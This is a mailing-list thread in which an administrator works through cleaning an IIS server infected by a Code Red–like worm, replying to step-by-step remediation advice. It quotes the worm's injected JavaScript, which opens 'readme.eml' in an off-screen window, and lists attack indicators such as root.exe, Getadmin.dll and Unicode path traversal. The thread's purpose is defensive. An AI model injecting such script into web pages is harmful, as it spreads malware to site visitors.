RE: IIS Worm

["Graham Howe" <graham@xxxxxxx>]

See my comments below:

> Hard to say really given the lack of information on it...
> first thing I
> suggest is close the IIS down if you have not already since you will
> currently be unwittingly attacking neighbouring IP ranges.
> (You will make at
> least 16 attacks)
>
I have stopped all web sites on the server, do i need to disable the actual
IIS service too? If so then where is the best place to do this (I am not an
NT4 server expert).

> The next stage will be for the moment the hard one. Finding
> out what was
> done to your system. If it follows Code Red as closely as current
> suggestions are then you will find multiple version of
> index.htm(l) and
> default.htm(l) in all web directories and some system
> directories. These
> files will contain any new "content" and as such should be
immdeiately
> destroyed.
>
It appears to be much worse than this, I have over 4500 files that have
been
altered today and they appear to include every page in every site on the
server (even the example stuff included in the initial installation).
Looking at the pages they all have the following added to the end of the
page:

<html><script
language="JavaScript">window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")</script></html>

which obviously causes problems for those visiting my sites.

> Assuming you have logging turned on for W3SRV then this might
> not be too
> difficult to track. The log will tell you everything that was
> done through
> IIS. It will also show you the successful loophole in your system that
> allowed it to happen. (see later)
>
I have not check the log as I could see all this already.

> A simple and effective although possibly time consuming
> excercise is to use
> the simple Find Files mechanism of Windows on your entire
> drive. You should
> be able to get a potential time from the W3SRV log files or
> at least between
> when you knew you were OK and when you discovered the breach.
> Any files in
> this timeframe should be examined for potential corruption.
>
As above there are over 4500 of them.

> If you find cmd.exe or similar in the IISSCRIPTS directory
> usally after a
> Code Red type attack, but check the whole InetPub tree,
> delete this file.
>
No sign of this, but I had installed the code red patch so I am not
surprised.

> Use Find files again to serach for *.eml. This is what you
> web server has
> been instructed to download and parse in order to install the
> worm. If the
> file isn't known to be yours, delete it without opening it or at worst
> archive to floppy and check on another machine not running IIS4/5.
>
Loads of these, all now deleted. However they come back following a reboot
so I obviously still have the worm on my system.

> Do a find *in* files looking for "readme.eml". This is the
> rogue file your
> server will attempt to distribute. Remove or fix any files
> containing a
> reference to it.
>
Big problem is the number affected, I don't know of a way to change that
many files.

> Before resuming IIS service in any way, you need to ensure
> that you are
> secure.
>
Looks like I will be out of action for a while.

> Disable script access to all directories across the board except where
> specifically needed and ensure that the scripts can only access known
> resources as INETUSER. One attempt, although largely
> unsuccessful, to access
> an IIS machine is using the scripts supplied in the default
> installation.
>

Please give idiot proof instructions on this, I am not sure of the best way
of sorting out script access and resources.

> Use Windows Update or your preferred mechanism to install all
> know updates
> particularly service
> packs and security updates.
>
I thought I had! Code Red was done but not Code Blue, I am now using
hfnetchk to see that all patches are there, is this best solution?

> Look at:
>
> http://www.microsoft.com/technet/treeview/default.asp?url=/tec
> hnet/security/
> bulletin/ms00-078.asp
>
This one was missing, it is in place now.

> and similar articles.
>
> If you need external access for configuration use IP based
> access to protect
> against password cracking attempts. If you do not, disable the  remote
> administration interface for IIS if it is enabled and remove
> the default
> installation of files in the INETPUB directory or set IIS to use a non
> standard root which will do effectively the same thing but
> preserves the
> original files for your reference if you want them.
>
I don't need remote admin, so should I simply stop the admin site within
IIS

> Ensure authoring permissions etc are set to maximum security
> and anything
> that seems slightly suspicious is set to use challenge response
> authentication only.
>
I tend to do everything through Frontpage publishing and SQL Server
Enterprise Manager. Both require passwords for access, but I am not sure
how
secure they are. Again are there any idiot guides as to what I should set
up?

> The following are known attacks of this virus. After you have
> installed the
> malformed URL fix, you will be immune to all, however, these
> items in your
> logs will indicate files you need to serach for and where appropriate
> destroy:
>
All these files are not present or else seem fine (old dates)

> get_mem_bin
> vti_bin owssvr.dll
> Root.exe
> CMD.EXE
> ../ (Unicode)
> Getadmin.dll
> Default.IDA
> /Msoffice/ cltreq.asp
>
>
> Also look out for readme.exe and admin.dll (56K) with a
> 'audio xwave' mime
> type which were the original propogation.
>
These have been removed.


> HTH.
>
It has but more help would still be welcome.

> Mark.
>
Graham


For more information: http://www.automatedhome.co.uk
Post message: ukha_d@xxxxxxx
Subscribe:  ukha_d-subscribe@xxxxxxx
Unsubscribe:  ukha_d-unsubscribe@xxxxxxx
List owner:  ukha_d-owner@xxxxxxx

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/